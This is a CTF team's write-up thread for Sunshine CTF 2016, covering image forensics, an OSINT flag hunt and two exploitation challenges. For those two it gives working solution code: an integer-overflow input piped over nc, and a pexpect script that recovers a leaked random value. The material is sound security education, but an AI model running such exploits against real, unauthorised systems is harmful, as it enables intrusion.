# Sunshine CTF 2016 - 12 March 2016 at 16 pm UTC, lasts 28,5 hours

Tags: discussion, ctf

Let's participate at [Sunshine CTF 2016](http://ctf.bsidesorlando.org).

The CTF will begin on 12 March 2016 16:00 UTC and ends on 13 March 2016 20:30 UTC.

As usual, we will play as [team sec.se](https://security.meta.stackexchange.com/questions/1117/a-security-stackexchange-ctf-team). The team communicates through the [CTF team chatroom](http://chat.stackexchange.com/rooms/7384/security-se-ctf-team).

---

We solved a total of **6** challenges worth **355** points in total. We got the **59th** place out of the +500 teams. Good job everyone!

[image: ranking]

Answer (score 10):

## Forensics: Butterfly Effect (50)

We were given an image of a [butterfly](https://web.archive.org/web/20160315122120/http://ctf.bsidesorlando.org/static/uploads/5676ebc69d9abdf9df4a39728f558100/butterfly.png). Running [`foremost`](http://foremost.sourceforge.net) on it didn't return anything special. I realised it was probably some image stegano-fu. After trying out some tools, I thought maybe this isn't about using some random stegano tools. I opened [GIMP](https://www.gimp.org) and started fiddling with some filters and colors. I finally used **Menu > Colors > Levels**:

[image: gimp: butterfly]

Answer (score 7):

## Forensics: That's No Moon (50)

We were given an image of [a moon](https://web.archive.org/web/20160315115542/http://ctf.bsidesorlando.org/static/uploads/213d461c72e1db462eb6e54c612f3fcf/moon.png). Opening it in a hex editor, I quickly noticed there's a zip file at the end:

[image: hex:moon.png]

I used [`foremost`](http://foremost.sourceforge.net) to extract the contents. Who knows I might have overlooked other files:

```
foremost -i moon.png -o output -v
```

[image: foremost]

I tried to extract it but it was password protected. After pondering for a while and looking into the image again I thought about guessing the password. It turned out the password was "moon":

[image]

Answer (score 7):

## Exploitation: alligatorsim95 (50)

We had to `nc` to the server which gave us some nice ASCII art:

```
nc 4.31.182.242 9000

              .-._   _ _ _ _ _ _ _ _
   .-''-.__.-'00  '-' ' ' ' ' ' ' ' '-.
  '.___ '    .   .--_'-' '-' '-' _'-' '._
   V: V 'vv-'   '_   '.       .'  _..' '.'.
     '=.____.=_.--'   :_.__.__:_   '.   : :
             (((____.-'        '-.  /   : :
   snd                         (((-' .' /
                             _____..'  .'
                            '-._____.-'
  -> welcome to alligatorsim95!

-> u r... AN ALLIGATOR!!
.. simulating alligator lifecycle ..
.. simulating alligator throwing physics..
-> you got 1337 eggz in ur nest, how many you gonna lay alligator??
```

We could increase the eggs in our nest by passing a value. I then thought if we could pass a negative value. It turned out it was possible: the eggs in the nest decreased. I then tried a huge negative number: `-10000000000`. I discovered there was an integer overflow. I quickly wrote a simple php script:

```
<?php

echo "-" . pow(2, 32) . "\n" .
     "-1338\n";
```

Pwning with a simple command `php exp_eggs.php | nc 4.31.182.242 9000`:
[image: alligatorsim95]

Answer (score 5):

## Exploitation: randy (100)

We were given an address to connect to and an executable:

[image: randy elf]

It turned out it was a 32 bit ELF executable. Running the executable resulted into "guessing" some input:

[image: guessing randy]

I used [retdec](https://retdec.com/decompilation/) to get some juicy info about the source:

```
int main(int argc, char ** argv) {
    char * mem = malloc(46); // 0x80485ae
    int32_t v1 = (int32_t)mem; // 0x80485bc
    strcpy(mem, "Welcome to Randy's TinyPoker! DebugInfo: AAAA\n");
    srand(time(NULL));
    uint32_t v2 = rand(); // 0x80485f6
    char * v3 = (char *)(v1 + 41); // 0x8048601_0
    *v3 = (char)((int32_t)*v3 + v2 / 0x1000000);
    char * v4 = (char *)(v1 + 42); // 0x804861e_0
    *v4 = (char)((int32_t)*v4 + v2 / 0x10000);
    char * v5 = (char *)(v1 + 43); // 0x804863b_0
    *v5 = (char)((int32_t)*v5 + v2 / 256);
    char * v6 = (char *)(v1 + 44); // 0x8048658_0
    *v6 = (char)((int32_t)*v6 + v2);
    printf(mem);
    printf("We've dealt you your hand face down, please enter it:\n");
    int32_t str;
    memset((char *)&str, 0, 5);
    int32_t stream = g1;
    fgets((char *)&str, 5, (struct struct__IO_FILE *)&stream);
    if (str == v2) {
        printf("You guessed that hand perfectly! Here's your prize: flag-here\n");
    } else {
        printf("Sorry, wrong hand, try again!\n");
    }
    return 0;
}
```

So basically `v1` points to a string in memory `Welcome to Randy's TinyPoker! DebugInfo: AAAA\n`, `v2` is some random number and `v3`, `v4`, `v5`, `v6` all point to the debug info part (AAAA initially).

Then it proceeds to add a *part* of the random number to each of `v3`, `v4`, `v5`, `v6` by dividing v2 first:

```
*v3 = (char)((int32_t)*v3 + v2 / 0x1000000); // v3 = v3 + (v2 / 2^24)
*v4 = (char)((int32_t)*v4 + v2 / 0x10000);   // v4 = v4 + (v4 / 2^16) 
*v5 = (char)((int32_t)*v5 + v2 / 256);       // v5 = v5 + (v5 / 2^8)
*v6 = (char)((int32_t)*v6 + v2);
```

At the end, it compares our input with the random generated value `str == v2`. So in order to guess correctly we need to get the debug info and substract `A` from each character, pack it and send it!

```
#!/usr/bin/python3

# Make sure to install pexpect (linux only) - pip install pexpect
import pexpect
import struct
import os

# Spawn the program
child = pexpect.spawn('./randy_noflag')

child.expect('Welcome to Randy\'s TinyPoker! DebugInfo: (.{4})')

debug = child.match.group(1)
payload = ""

print(debug)

for char in debug:
    byte = char - 0x41 # Substract "A"
    byte %= 256        # Prevent out of range errors 
    payload += "{:02x}".format(byte) # Convert to hex and append

payload = bytes.fromhex(payload)[::-1] # convert to bytes and reverse

# Own it
child.sendline(payload)
child.interact()
```

[image: randy pwn]

This local script was handy since the remote server was down some of the times.

The flag: `sun{c4rds_in_th3_tr4p}`.

Answer (score 2):

### Misc.: Find Floridaman (50)

> In other news… Floridaman did what with an alligator?
>
> Remember, this has the normal flag format.

Well, at the time I started the challenge, the following hints were added by the Sunshine CTF team:

> Hint: You need only look at comments from Florida-based news websites.
>
> Hint: Gator went threw a window!

Let's [Google](https://www.google.com/search?tbm=nws&q=flori+duh+alligator+window) then. The first website in the results has only [one comment](http://www.mypalmbeachpost.com/news/news/crime-law/wendys-alligator-thrower-is-only-fulfilling-his-fl/nqNfr/?lf-content=157841962:475608933&hubRefSrc=permalink):

> May the Lord have mercy on this man. That poor woman in the drivethrough! sun{1s_th1s_even_real_l1fe?}

The flag is `sun{1s_th1s_even_real_l1fe?}`.